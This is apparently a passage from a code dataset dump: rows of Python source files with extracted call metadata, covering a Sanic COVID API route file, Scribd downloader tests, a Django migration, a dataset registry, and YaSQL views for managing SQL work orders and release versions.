({(903, 26, 903, 
69): "('Mask static plot saved to ' + savepath_pdf)"}, {}), "('Mask static plot saved to ' + savepath_pdf)", False, 'import logging\n'), ((1019, 13, 1019, 27), 'numpy.isnan', 'np.isnan', ({(1019, 22, 1019, 26): 'cell'}, {}), '(cell)', True, 'import numpy as np\n'), ((1200, 26, 1200, 45), 'numpy.arange', 'np.arange', ({(1200, 36, 1200, 37): '(0)', (1200, 38, 1200, 41): '(120)', (1200, 42, 1200, 44): '(15)'}, {}), '(0, 120, 15)', True, 'import numpy as np\n'), ((1219, 27, 1219, 88), 'os.path.join', 'os.path.join', ({(1219, 40, 1219, 47): 'out_dir', (1219, 49, 1219, 87): "name + '_' + datestring_file + '.png'"}, {}), "(out_dir, name + '_' + datestring_file + '.png')", False, 'import os\n'), ((1221, 12, 1221, 70), 'logging.debug', 'logging.debug', ({(1221, 26, 1221, 69): "('Mask static plot saved to ' + savepath_png)"}, {}), "('Mask static plot saved to ' + savepath_png)", False, 'import logging\n'), ((1223, 27, 1223, 88), 'os.path.join', 'os.path.join', ({(1223, 40, 1223, 47): 'out_dir', (1223, 49, 1223, 87): "name + '_' + datestring_file + '.pdf'"}, {}), "(out_dir, name + '_' + datestring_file + '.pdf')", False, 'import os\n'), ((1225, 12, 1225, 70), 'logging.debug', 'logging.debug', ({(1225, 26, 1225, 69): "('Mask static plot saved to ' + savepath_pdf)"}, {}), "('Mask static plot saved to ' + savepath_pdf)", False, 'import logging\n'), ((1243, 28, 1243, 46), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ({}, {}), '()', True, 'import cartopy.crs as ccrs\n'), ((92, 35, 92, 70), 'numpy.linspace', 'np.linspace', (), '', True, 'import numpy as np\n'), ((180, 42, 180, 60), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ({}, {}), '()', True, 'import cartopy.crs as ccrs\n'), ((24, 90, 24, 108), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ({}, {}), '()', True, 'import cartopy.crs as ccrs\n'), ((437, 18, 437, 62), 'numpy.where', 'np.where', ({(437, 27, 437, 61): "time == track_cell['time'].values[0]"}, {}), "(time == track_cell['time'].values[0])", True, 'import numpy as np\n'), ((696, 18, 696, 62), 'numpy.where', 'np.where', ({(696, 27, 696, 61): "time == track_cell['time'].values[0]"}, {}), "(time == track_cell['time'].values[0])", True, 'import numpy as np\n'), ((822, 18, 822, 62), 'numpy.where', 'np.where', ({(822, 27, 822, 61): "time == track_cell['time'].values[0]"}, {}), "(time == track_cell['time'].values[0])", True, 'import numpy as np\n'), ((1115, 18, 1115, 62), 'numpy.where', 'np.where', ({(1115, 27, 1115, 61): "time == track_cell['time'].values[0]"}, {}), "(time == track_cell['time'].values[0])", True, 'import numpy as np\n'), ((438, 26, 438, 71), 'numpy.where', 'np.where', ({(438, 35, 438, 70): "time == track_cell['time'].values[-1]"}, {}), "(time == track_cell['time'].values[-1])", True, 'import numpy as np\n'), ((697, 26, 697, 71), 'numpy.where', 'np.where', ({(697, 35, 697, 70): "time == track_cell['time'].values[-1]"}, {}), "(time == track_cell['time'].values[-1])", True, 'import numpy as np\n'), ((823, 26, 823, 71), 'numpy.where', 'np.where', ({(823, 35, 823, 70): "time == track_cell['time'].values[-1]"}, {}), "(time == track_cell['time'].values[-1])", True, 'import numpy as np\n'), ((1116, 26, 1116, 71), 'numpy.where', 'np.where', ({(1116, 35, 1116, 70): "time == track_cell['time'].values[-1]"}, {}), "(time == track_cell['time'].values[-1])", True, 'import numpy as np\n')] |
nf1s/covid-backend | api/urls.py | 5529cccad2b0b596d8a720fd6211035e6376820f | from sanic import Blueprint
from sanic_transmute import add_route
from .views import (
get_all,
get_status_by_country_id,
get_status_by_country_name,
get_deaths,
get_active_cases,
get_recovered_cases,
get_confirmed_cases,
list_countries,
)
cases = Blueprint("cases", url_prefix="/cases")
add_route(cases, get_all)
add_route(cases, get_status_by_country_id)
add_route(cases, get_status_by_country_name)
add_route(cases, get_deaths)
add_route(cases, get_active_cases)
add_route(cases, get_recovered_cases)
add_route(cases, get_confirmed_cases)
add_route(cases, list_countries)
| [((14, 8, 14, 47), 'sanic.Blueprint', 'Blueprint', (), '', False, 'from sanic import Blueprint\n'), ((15, 0, 15, 25), 'sanic_transmute.add_route', 'add_route', ({(15, 10, 15, 15): 'cases', (15, 17, 15, 24): 'get_all'}, {}), '(cases, get_all)', False, 'from sanic_transmute import add_route\n'), ((16, 0, 16, 42), 'sanic_transmute.add_route', 'add_route', ({(16, 10, 16, 15): 'cases', (16, 17, 16, 41): 'get_status_by_country_id'}, {}), '(cases, get_status_by_country_id)', False, 'from sanic_transmute import add_route\n'), ((17, 0, 17, 44), 'sanic_transmute.add_route', 'add_route', ({(17, 10, 17, 15): 'cases', (17, 17, 17, 43): 'get_status_by_country_name'}, {}), '(cases, get_status_by_country_name)', False, 'from sanic_transmute import add_route\n'), ((18, 0, 18, 28), 'sanic_transmute.add_route', 'add_route', ({(18, 10, 18, 15): 'cases', (18, 17, 18, 27): 'get_deaths'}, {}), '(cases, get_deaths)', False, 'from sanic_transmute import add_route\n'), ((19, 0, 19, 34), 'sanic_transmute.add_route', 'add_route', ({(19, 10, 19, 15): 'cases', (19, 17, 19, 33): 'get_active_cases'}, {}), '(cases, get_active_cases)', False, 'from sanic_transmute import add_route\n'), ((20, 0, 20, 37), 'sanic_transmute.add_route', 'add_route', ({(20, 10, 20, 15): 'cases', (20, 17, 20, 36): 'get_recovered_cases'}, {}), '(cases, get_recovered_cases)', False, 'from sanic_transmute import add_route\n'), ((21, 0, 21, 37), 'sanic_transmute.add_route', 'add_route', ({(21, 10, 21, 15): 'cases', (21, 17, 21, 36): 'get_confirmed_cases'}, {}), '(cases, get_confirmed_cases)', False, 'from sanic_transmute import add_route\n'), ((22, 0, 22, 32), 'sanic_transmute.add_route', 'add_route', ({(22, 10, 22, 15): 'cases', (22, 17, 22, 31): 'list_countries'}, {}), '(cases, list_countries)', False, 'from sanic_transmute import add_route\n')] |
fatshotty/scribd-downloader | scribdl/test/test_download.py | d07e301c0a7781cf0b8cf38846061e043e8b86e9 | from ..downloader import Downloader
import os
import pytest
@pytest.fixture
def cwd_to_tmpdir(tmpdir):
os.chdir(str(tmpdir))
def test_audiobook_download(cwd_to_tmpdir, monkeypatch):
audiobook_url = "https://www.scribd.com/audiobook/237606860/100-Ways-to-Motivate-Yourself-Change-Your-Life-Forever"
audiobook_downloader = Downloader(audiobook_url)
audio = audiobook_downloader.download()
assert audio[0] == "100_Ways_to_Motivate_Yourself__Change_Your_Life_Forever_preview.mp3"
assert os.path.getsize(audio[0]) == 2127830
def test_text_document_download(cwd_to_tmpdir):
text_doc_url = "https://www.scribd.com/document/96882378/Trademark-License-Agreement"
text_downloader = Downloader(text_doc_url)
md_doc = text_downloader.download(is_image_document=False)
assert os.path.getsize(md_doc.input_content) in range(1000, 2000)
md_doc.to_pdf()
assert os.path.getsize(md_doc.pdf_path) in range(20000, 31000)
def test_img_document_download(cwd_to_tmpdir):
img_doc_url = "https://www.scribd.com/doc/136711944/Signature-Scanning-and-Verification-in-Finacle"
img_downloader = Downloader(img_doc_url)
imgs = img_downloader.download(is_image_document=True)
assert len(imgs.input_content) == 2
imgs.to_pdf()
assert os.path.getsize(imgs.pdf_path) in range(140000, 150000)
def test_book_download(cwd_to_tmpdir, monkeypatch):
book_url = "https://www.scribd.com/read/262694921/Acting-The-First-Six-Lessons"
book_downloader = Downloader(book_url)
# We don't want to clutter stdout with book contents if this test fails
monkeypatch.setattr("builtins.print", lambda x: None)
md_book = book_downloader.download()
assert os.path.getsize(md_book.input_content) in range(10000, 20000)
md_book.to_pdf()
assert os.path.getsize(md_book.pdf_path) in range(200000, 2500000)
| [((17, 11, 17, 36), 'os.path.getsize', 'os.path.getsize', ({(17, 27, 17, 35): 'audio[0]'}, {}), '(audio[0])', False, 'import os\n'), ((24, 11, 24, 48), 'os.path.getsize', 'os.path.getsize', ({(24, 27, 24, 47): 'md_doc.input_content'}, {}), '(md_doc.input_content)', False, 'import os\n'), ((26, 11, 26, 43), 'os.path.getsize', 'os.path.getsize', ({(26, 27, 26, 42): 'md_doc.pdf_path'}, {}), '(md_doc.pdf_path)', False, 'import os\n'), ((35, 11, 35, 41), 'os.path.getsize', 'os.path.getsize', ({(35, 27, 35, 40): 'imgs.pdf_path'}, {}), '(imgs.pdf_path)', False, 'import os\n'), ((44, 11, 44, 49), 'os.path.getsize', 'os.path.getsize', ({(44, 27, 44, 48): 'md_book.input_content'}, {}), '(md_book.input_content)', False, 'import os\n'), ((46, 11, 46, 44), 'os.path.getsize', 'os.path.getsize', ({(46, 27, 46, 43): 'md_book.pdf_path'}, {}), '(md_book.pdf_path)', False, 'import os\n')] |
hungitptit/boecdjango | app/migrations/0005_auto_20210619_2310.py | a1125bd292b5fd3a0610eda6e592017f8268c96c | # Generated by Django 3.2.4 on 2021-06-19 16:10
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('app', '0004_auto_20210619_1802'),
]
operations = [
migrations.AddField(
model_name='comment',
name='create_at',
field=models.DateTimeField(auto_now_add=True, db_column='create_at', default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='comment',
name='subject',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='comment',
name='update_at',
field=models.DateTimeField(auto_now=True, db_column='update_at'),
),
]
| [((17, 18, 17, 115), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((23, 18, 23, 62), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((28, 18, 28, 76), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n')] |
shonohs/vision-datasets | vision_datasets/common/dataset_registry.py | bdd0ebf5c0c0561486ebb0b96600196b2b89f77c | import copy
import json
from .dataset_info import DatasetInfoFactory
class DatasetRegistry:
"""
A central registry of all available datasets
"""
def __init__(self, datasets_json: str):
self.datasets = [DatasetInfoFactory.create(d) for d in json.loads(datasets_json)]
def get_dataset_info(self, dataset_name, dataset_version=None):
datasets = [d for d in self.datasets if d.name == dataset_name and (not dataset_version or d.version == dataset_version)]
if not datasets:
return None
sorted_datasets = sorted(datasets, key=lambda d: d.version)
return copy.deepcopy(sorted_datasets[-1])
def list_data_version_and_types(self):
return [{'name': d.name, 'version': d.version, 'type': d.type, 'description': d.description} for d in self.datasets]
@staticmethod
def _get_default_dataset_json(json_file_name):
import sys
py_version = sys.version_info
if py_version.minor >= 7:
import importlib.resources as pkg_resources
from vision_datasets import resources
datasets_json = pkg_resources.read_text(resources, json_file_name)
else:
import pkgutil
resource_package = 'vision_datasets'
resource_path = '/'.join(('resources', json_file_name))
datasets_json = pkgutil.get_data(resource_package, resource_path)
return datasets_json
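# Editor's usage sketch (added for clarity, not part of the original module): typical calls
# against the registry. datasets_json is assumed to be a JSON string describing a list of
# datasets in the format understood by DatasetInfoFactory.create() (see dataset_info.py);
# 'my-dataset' is a placeholder name.
def _example_registry_usage(datasets_json: str):
    registry = DatasetRegistry(datasets_json)
    all_datasets = registry.list_data_version_and_types()
    latest = registry.get_dataset_info('my-dataset')
    pinned = registry.get_dataset_info('my-dataset', dataset_version=1)
    return all_datasets, latest, pinned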
| [((20, 15, 20, 49), 'copy.deepcopy', 'copy.deepcopy', ({(20, 29, 20, 48): 'sorted_datasets[-1]'}, {}), '(sorted_datasets[-1])', False, 'import copy\n'), ((32, 28, 32, 78), 'importlib.resources.read_text', 'pkg_resources.read_text', ({(32, 52, 32, 61): 'resources', (32, 63, 32, 77): 'json_file_name'}, {}), '(resources, json_file_name)', True, 'import importlib.resources as pkg_resources\n'), ((37, 28, 37, 77), 'pkgutil.get_data', 'pkgutil.get_data', ({(37, 45, 37, 61): 'resource_package', (37, 63, 37, 76): 'resource_path'}, {}), '(resource_package, resource_path)', False, 'import pkgutil\n'), ((12, 63, 12, 88), 'json.loads', 'json.loads', ({(12, 74, 12, 87): 'datasets_json'}, {}), '(datasets_json)', False, 'import json\n')] |
Fanduzi/YaSQL | yasql/apps/sqlorders/views.py | bc6366a9b1c1e9ed84fd24ea2b4a21f8f99d0af5 | # -*- coding:utf-8 -*-
# edit by fuzongfei
import base64
import datetime
# Create your views here.
import json
from django.http import Http404, HttpResponse
from django.utils import timezone
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters
from rest_framework.exceptions import PermissionDenied
from rest_framework.generics import ListAPIView, GenericAPIView, CreateAPIView, UpdateAPIView, DestroyAPIView
from rest_framework.views import APIView
from rest_framework.viewsets import ViewSet
from libs import permissions
from libs.Pagination import Pagination
from libs.RenderColumns import render_dynamic_columns
from libs.response import JsonResponseV1
from sqlorders import models, serializers
from sqlorders.filters import SqlOrderListFilter, GetTasksListFilter
class GetDBEnvironment(ListAPIView):
queryset = models.DbEnvironment.objects.all()
serializer_class = serializers.DbEnvironmentSerializer
# 获取工单环境
def get(self, request, *args, **kwargs):
serializer = self.get_serializer(self.get_queryset(), many=True)
return JsonResponseV1(data=serializer.data)
class GetDbSchemas(APIView):
# 获取指定环境指定用途的schemas列表
def get(self, request):
serializer = serializers.DbSchemasSerializer(data=request.query_params)
if serializer.is_valid():
return JsonResponseV1(data=serializer.query)
return JsonResponseV1(message=serializer.errors, code='0001')
class IncepSyntaxCheckView(APIView):
def post(self, request, *args, **kwargs):
serializer = serializers.IncepSyntaxCheckSerializer(data=request.data)
if serializer.is_valid():
s, data = serializer.check()
render_columns = [
{'key': 'order_id', 'value': '序号'},
{'key': 'stage', 'value': '阶段'},
{'key': 'stage_status', 'value': '阶段状态'},
{'key': 'error_level', 'value': '错误级别'},
{'key': 'error_message', 'value': '错误信息', 'width': '35%'},
{'key': 'sql', 'value': 'SQL内容', 'width': '25%', 'ellipsis': True},
{'key': 'affected_rows', 'value': '影响/扫描行数'}
]
columns = render_dynamic_columns(render_columns)
message = '语法检查未发现异常,可以提交'
if not s:
message = '语法检查发现异常,详情请查看输出,更正后在提交'
d = {
'status': 0 if s else 1,
'data': data
}
data = {'columns': columns, 'data': d}
return JsonResponseV1(data=data, message=message)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class SqlOrdersCommit(GenericAPIView):
permission_classes = (permissions.CanCommitOrdersPermission,)
serializer_class = serializers.SqlOrdersCommitSerializer
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="提交成功")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class SqlOrdersList(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrders.objects.all()
serializer_class = serializers.SqlOrdersListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = SqlOrderListFilter
ordering = ['-created_at']
search_fields = ['title', 'database', 'remark', 'applicant', 'progress', 'contents']
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, many=True)
render_columns = [
{'key': 'progress', 'value': '进度', 'width': '8%'},
{'key': 'applicant', 'value': '申请人'},
{'key': 'department', 'value': '部门'},
{'key': 'env_name', 'value': '环境'},
{'key': 'escape_title', 'value': '标题', 'width': '18%', 'ellipsis': True},
{'key': 'sql_type', 'value': '类型'},
{'key': 'remark', 'value': '备注'},
{'key': 'version', 'value': '版本'},
{'key': 'host', 'value': '实例/库'},
{'key': 'auditor', 'value': '审核人'},
{'key': 'reviewer', 'value': '复核人'},
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class SqlOrdersDetail(ListAPIView):
"""SQL工单详情"""
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrders.objects.all()
serializer_class = serializers.SqlOrderDetailSerializer
lookup_field = 'order_id'
def get(self, request, *args, **kwargs):
queryset = self.get_object()
serializer = self.get_serializer(queryset, context={"request": request})
return JsonResponseV1(data=serializer.data)
class OpSqlOrderView(ViewSet):
"""更新SQL工单状态,如:审核,关闭等"""
permission_classes = (permissions.CanViewOrdersPermission,)
def get_obj(self, pk):
try:
obj = models.DbOrders.objects.get(pk=pk)
return obj
except models.DbOrders.DoesNotExist:
raise Http404
def approve(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_approve"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def feedback(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_feedback"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def close(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_close"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def review(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_review"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
class GenerateTasksView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.GenerateSqlOrdersTasksSerializer(data=request.data)
if serializer.is_valid():
data = serializer.save(request)
return JsonResponseV1(data=data)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class GetTaskIdView(APIView):
def get(self, request, *args, **kwargs):
"""根据order id返回taskid"""
order_id = kwargs.get('order_id')
task_id = models.DbOrdersExecuteTasks.objects.filter(order_id=order_id).first().task_id
return JsonResponseV1(data=task_id)
class GetTasksPreviewView(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.SqlOrdersTasksListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = GetTasksListFilter
search_fields = ['sql']
ordering = ['created_time']
def get(self, request, *args, **kwargs):
task_id = kwargs.get('task_id')
queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id))
        # The data-hiding switch is enabled for this order
        # Only the applicant, auditor, reviewer and superusers are allowed to view the data
obj = models.DbOrders.objects.get(
pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id
)
if obj.is_hide == 'ON' and not request.user.is_superuser:
allowed_view_users = [obj.applicant]
allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)])
allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)])
if request.user.username not in allowed_view_users:
raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')
origin_queryset = self.queryset.filter(task_id=task_id)
total = origin_queryset.count()
progress_0 = origin_queryset.filter(progress=0).count()
progress_1 = origin_queryset.filter(progress=1).count()
progress_3 = origin_queryset.filter(progress=3).count()
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, context={'request': request}, many=True)
render_columns = [
            {'key': 'num', 'value': '序号'},  # custom "num" column, used by the frontend to display row numbers
{'key': 'applicant', 'value': '申请人'},
{'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'},
{'key': 'progress', 'value': '进度'},
            {'key': 'result', 'value': '查看结果'},  # custom "result" column
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns,
'data': {'data': serializer.data,
'total': total,
'progress_0': progress_0,
'progress_1': progress_1,
'progress_3': progress_3}}
return self.get_paginated_response(data)
class GetTasksListView(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.SqlOrdersTasksListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = GetTasksListFilter
search_fields = ['sql']
ordering = ['created_time']
def get(self, request, *args, **kwargs):
task_id = kwargs.get('task_id')
queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id))
        # The data-hiding switch is enabled for this order
        # Only the applicant, auditor, reviewer and superusers are allowed to view the data
obj = models.DbOrders.objects.get(
pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id
)
if obj.is_hide == 'ON' and not request.user.is_superuser:
allowed_view_users = [obj.applicant]
allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)])
allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)])
if request.user.username not in allowed_view_users:
raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, context={'request': request}, many=True)
render_columns = [
            {'key': 'num', 'value': '序号'},  # custom "num" column, used by the frontend to display row numbers
{'key': 'applicant', 'value': '申请人'},
{'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'},
{'key': 'progress', 'value': '进度'},
            {'key': 'execute', 'value': '执行'},  # custom "execute" column
            {'key': 'result', 'value': '查看结果'},  # custom "result" column
]
if queryset.exists():
if queryset.first().sql_type == 'DDL':
render_columns.insert(-1, {'key': 'ghost_pause', 'value': '暂停(gh-ost)'})
render_columns.insert(-1, {'key': 'ghost_recovery', 'value': '恢复(gh-ost)'})
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class ExecuteSingleTaskView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ExecuteSingleTaskSerializer(data=request.data)
if serializer.is_valid():
serializer.execute(request)
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class ExecuteMultiTasksView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ExecuteMultiTasksSerializer(data=request.data)
if serializer.is_valid():
serializer.execute(request)
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class ThrottleTaskView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ThrottleTaskSerializer(data=request.data)
if serializer.is_valid():
message = serializer.execute(request)
return JsonResponseV1(message=message)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class GetTasksResultView(ListAPIView):
"""SQL工单详情"""
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.GetTasksResultSerializer
lookup_field = 'id'
def get(self, request, *args, **kwargs):
queryset = self.get_object()
serializer = self.get_serializer(queryset, context={"request": request})
return JsonResponseV1(data=serializer.data)
class HookSqlOrdersView(APIView):
permission_classes = (permissions.anyof(permissions.CanCommitOrdersPermission,
permissions.CanViewOrdersPermission,
permissions.CanExecuteOrdersPermission,
permissions.CanAuditOrdersPermission),
)
def post(self, request, *args, **kwargs):
serializer = serializers.HookSqlOrdersSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class DownloadExportFilesView(APIView):
"""下载导出文件"""
permission_classes = (permissions.CanViewOrdersPermission,)
def get(self, request, base64_filename):
file_name = base64.b64decode(base64_filename).decode()
if not models.DbExportFiles.objects.filter(file_name=file_name).exists():
raise Http404
obj = models.DbExportFiles.objects.get(file_name=file_name)
if not models.DbOrdersExecuteTasks.objects.get(pk=obj.task_id).applicant == request.user.username:
raise PermissionDenied(detail='您没有权限')
fsock = open(f"media/{obj.files}", 'rb')
response = HttpResponse(fsock, content_type="application/zip")
response['Content-Disposition'] = f'attachment; filename={file_name}'
return response
class ReleaseVersionsGet(APIView):
"""获取上线版本号,提交工单使用"""
def get(self, request):
before_30_days = (timezone.now() - datetime.timedelta(days=30))
queryset = models.ReleaseVersions.objects.filter(
expire_time__gte=before_30_days
).values('id', 'version', 'expire_time').order_by('-created_at')
for row in queryset:
row['disabled'] = 0
if row['expire_time'] < datetime.datetime.date(timezone.now()):
row['disabled'] = 1
return JsonResponseV1(data=queryset)
class ReleaseVersionsList(ListAPIView):
"""获取上线版本号列表,管理上线版本号使用"""
permission_classes = (permissions.CanViewVersionPermission,)
queryset = models.ReleaseVersions.objects.all()
serializer_class = serializers.ReleaseVersionsListSerializer
pagination_class = Pagination
filter_backends = [filters.SearchFilter, filters.OrderingFilter]
search_fields = ['username', 'version', 'expire_time']
ordering = ['-created_at']
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, many=True)
render_columns = [
{'key': 'version', 'value': '版本'},
{'key': 'username', 'value': '创建人'},
{'key': 'expire_time', 'value': '截止日期'},
{'key': 'created_at', 'value': '创建时间'},
{'key': 'key', 'value': '操作'},
{'key': 'id', 'value': '详情'},
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class ReleaseVersionsCreate(CreateAPIView):
"""创建版本"""
permission_classes = (permissions.CanCreateVersionsPermission,)
serializer_class = serializers.ReleaseVersionsCreateSerializer
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
self.perform_create(serializer)
return JsonResponseV1(message="创建成功")
return JsonResponseV1(code='0001', message=serializer.errors, flat=True)
class ReleaseVersionsUpdate(UpdateAPIView):
"""更新版本号,该类只更新单条记录"""
permission_classes = (permissions.CanUpdateVersionsPermission,)
def put(self, request, *args, **kwargs):
serializer = serializers.ReleaseVersionsSerializer(
            instance=models.ReleaseVersions.objects.get(pk=kwargs['key']),  # returns a single record
data=request.data
)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="更新成功")
return JsonResponseV1(code='0001', message=serializer.errors, flat=True)
class ReleaseVersionsDelete(DestroyAPIView):
"""删除版本"""
permission_classes = (permissions.CanDeleteVersionsPermission,)
queryset = models.ReleaseVersions.objects.all()
    lookup_field = 'id'  # defaults to the primary key; may be omitted
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
return JsonResponseV1(message="删除成功")
class ReleaseVersionsView(APIView):
"""获取指定版本内工单在所有环境的进度"""
def get(self, request, *args, **kwargs):
        # Get the primary key for this version
version = kwargs.get('version')
version_id = models.ReleaseVersions.objects.get(version=version).pk
        # Get the environments and pivot the rows into dynamic columns
obj = models.DbEnvironment.objects.values('id', 'name')
row2columns = ''
for row in obj:
row2columns += f"max(if(env_id={row['id']}, progress, -1)) as {row['name']},"
        # Get the status of every work order under the task in each environment (one dynamic column per environment)
        # the id column has no real meaning here
query = f"select " + row2columns + \
f"substring(MD5(RAND()),1,20) as id,title as escape_title,order_id, applicant " \
f"from yasql_dborders where version_id='{version_id}' group by escape_title,order_id,applicant"
rawquery = models.DbOrders.objects.raw(query)
        # Get the environment column names
dynamic_columns = list(rawquery.columns)[:-4]
data = []
for row in rawquery:
columns = {
'id': row.id,
'escape_title': row.escape_title,
'order_id': row.order_id,
'applicant': row.applicant,
}
for col in dynamic_columns:
columns[col] = getattr(row, col)
data.append(columns)
render_columns = [
{'key': 'escape_title', 'ellipsis': True, 'value': '标题'},
{'key': 'applicant', 'value': '申请人'},
]
render_columns.extend([{'key': x, 'value': x} for x in dynamic_columns])
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': data}
return JsonResponseV1(data=data)
| [((26, 15, 26, 49), 'sqlorders.models.DbEnvironment.objects.all', 'models.DbEnvironment.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((87, 15, 87, 44), 'sqlorders.models.DbOrders.objects.all', 'models.DbOrders.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((120, 15, 120, 44), 'sqlorders.models.DbOrders.objects.all', 'models.DbOrders.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((201, 15, 201, 56), 'sqlorders.models.DbOrdersExecuteTasks.objects.all', 'models.DbOrdersExecuteTasks.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((252, 15, 252, 56), 'sqlorders.models.DbOrdersExecuteTasks.objects.all', 'models.DbOrdersExecuteTasks.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((334, 15, 334, 56), 'sqlorders.models.DbOrdersExecuteTasks.objects.all', 'models.DbOrdersExecuteTasks.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((398, 15, 398, 51), 'sqlorders.models.ReleaseVersions.objects.all', 'models.ReleaseVersions.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((453, 15, 453, 51), 'sqlorders.models.ReleaseVersions.objects.all', 'models.ReleaseVersions.objects.all', ({}, {}), '()', False, 'from sqlorders import models, serializers\n'), ((32, 15, 32, 51), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((38, 21, 38, 79), 'sqlorders.serializers.DbSchemasSerializer', 'serializers.DbSchemasSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((41, 15, 41, 69), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((46, 21, 46, 78), 'sqlorders.serializers.IncepSyntaxCheckSerializer', 